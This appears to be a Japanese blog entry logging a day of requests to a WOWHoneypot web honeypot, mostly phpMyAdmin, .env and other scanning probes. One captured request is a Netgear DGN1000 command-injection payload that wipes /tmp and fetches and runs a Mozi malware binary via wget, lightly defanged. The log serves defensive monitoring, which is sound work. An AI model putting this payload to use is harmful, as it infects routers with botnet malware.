WOWHoneypot観察(304日目)
2020/01/14(火)
トータルは82件でした。
ハンティングログは以下です。
| 49.89.55[.]208 wget+hxxp[:]//192.168.1[.]1:8088/Mozi.m |
| 件数 | 概要 | リクエスト |
|---|---|---|
| 48 | アクセス | GET / |
| 9 | 調査 | GET /script |
| 4 | アクセス | GET /favicon.ico |
| 3 | クローリング | GET /robots.txt |
| 1 | 調査 | OPTIONS / |
| 1 | Jenkinsの調査 | GET /view/all/builds |
| 1 | サイト構成の調査 | GET /sitemap.xml |
| 1 | DGN1000 Netgear ルータの脆弱性を狙った通信 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+hxxp[:]//192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
| 1 | Yealinkの調査? | GET /servlet?m=mod_listener&p=login&q=loginForm&jumpto=status |
| 1 | phpMyAdminの調査 | GET /muieblackcat |
| 1 | phpMyAdminの調査 | GET /phpmyadmin//index.php |
| 1 | phpMyAdminの調査 | GET //pma/scripts/setup.php |
| 1 | phpMyAdminの調査 | GET //phpmyadmin/scripts/setup.php |
| 1 | phpMyAdminの調査 | GET //phpMyAdmin/scripts/setup.php |
| 1 | phpMyAdminの調査 | GET //myadmin/scripts/setup.php |
| 1 | phpMyAdminの調査 | GET //index.php |
| 1 | phpMyAdminの調査 | GET //MyAdmin/scripts/setup.php |
| 1 | テストファイルち調査 | GET //cgi-bin/test-cgi |
| 1 | 環境設定の調査 | GET //cgi-bin/env.sh |
| 1 | SSL証明書発行時の一時ファイルの調査 | GET /.well-known/security.txt |
| 1 | 環境設定の調査 | GET /.env |
| 1 | 不正中継の試み | CONNECT ip.ws.126.net:443 |
にほんブログ村